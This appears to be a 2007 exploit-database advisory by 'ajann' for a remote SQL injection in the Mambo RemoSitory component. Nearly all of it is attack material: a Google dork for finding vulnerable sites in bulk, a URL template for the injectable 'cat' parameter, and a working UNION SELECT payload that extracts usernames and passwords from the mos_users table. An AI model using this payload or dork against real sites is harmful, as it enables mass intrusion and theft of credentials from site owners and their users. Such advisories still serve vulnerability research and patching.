******************************************************************************* # Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.remository.com/ # $$ : Free # Dork : inurl:func=selectcat + com_remository // Result:43.400 # DorkEx : http://www.google.com.tr/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]///index.php?option=com_remository&func=selectcat&cat=[SQL] Example: //index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/* [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2007-08-23]